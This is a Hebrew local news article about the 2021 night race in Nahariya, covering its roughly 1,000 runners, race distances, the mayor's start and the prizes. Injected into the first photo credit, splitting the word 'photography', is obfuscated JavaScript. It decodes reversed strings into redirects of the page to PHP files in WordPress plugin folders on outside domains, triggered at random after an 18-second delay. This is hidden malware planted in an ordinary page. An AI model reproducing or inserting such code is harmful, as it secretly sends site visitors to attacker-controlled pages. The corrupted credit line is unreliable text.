fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

1000 רצים ורצות במרוץ הלילה הגדול בנהריה

1000 רצים ורצות, ילדים ומבוגרים, משפחות וקבוצות, מנהריה ומחוצה לה, השתתפו במרוץ הלילה הגדול של נהריה שהתקיים אמש (חמישי) בשדרות הגעתון ובטיילת העירונית. היה מדהים!
מירוץ הלילה של נהריה 2021 | צילום: Ritvo pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tography

אווירה טובה, מזג אוויר מצוין ואנרגיות שיא, הפכו את מירוץ הלילה שהוזנק אמש למהנה ומוצלח.

מירוץ הלילה של נהריה 2021 הוזנק אתמול (חמישי) בשעה 19:00 בערב בהשתתפות של כ-1000 רצים ורצות, ביניהן משפחות, ילדים ומבוגרים, תושבי העיר ורצים שהגיעו מכל רחבי הארץ.

ראש העיר מזניק את הרצים במסגרת מירוץ הלילה 2021 של נהריה | צילום: Ritvo photography

במירוץ התקיימו שלושה מקצים תחרותיים באורך 3 ק"מ, 5 ק"מ ו-10 ק"מ על פי חלוקה לקטגוריות גיל ומגדר.

את המקצים הזניק ראש העיר, רונן מרלי משדרות הגעתון מערבה לכיוון הטיילת. במקצה העממי השתתפו בין השאר ילדים והורים, קבוצת הכדורסל של עירוני נהריה, נציגי בי"ס ע"ש רונה רמון ועוד. בנוסף, השתתפה קבוצה גדולה של לוחמי אש מתחנת נהריה.

קבוצת הכדורסל של עירוני נהריה במירוץ הלילה 2021 | צילום: Ritvo photography

הרצים במקצים התחרותיים נהנו השנה, לראשונה, ממסלול אטרקטיבי לאורך הטיילת הצפונית מצומת הגעתון ועד לרחוב דוד בן גאון ששם המתינו להם ועודדו רבים שהתאספו לאורך המסלול. בסיום האירוע זכה כל משתתף שסיים את הריצה במדליה, והזוכים במקומות הראשונים בגביעים אותם העניקו ראש עיריית נהריה, רונן מרלי, מ"מ מנכ"ל העירייה, דוד אלחיאני ומנהל מחלקת הספורט משה שיטרית.

"שמחתי לראות את הרצים שהגיעו מכל רחבי הארץ ובאו ליהנות ממרוץ הלילה שהיה חלק מרכזי מאירועי חול המועד סוכות 2021", ציין ראש העיר, רונן מרלי "המירוץ כלל בפעם הראשונה גם את הטיילת הצפונית, הרצים נהנו משדרות הגעתון, היתה אווירה טובה ומזג אוויר מצוין לאורך המסלול. אנחנו מחכים ומצפים לראות את כולם גם במירוץ הבא בעיר".

סיימו בהצלחה! מירוץ הלילה של נהריה 2021 | צילום: Ritvo photography

 

לחדשות נוספות בחדשות נהריה וצפון 1 הקליקו כאן* לדף הפייסבוק שלנו הקליקו כאן*

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות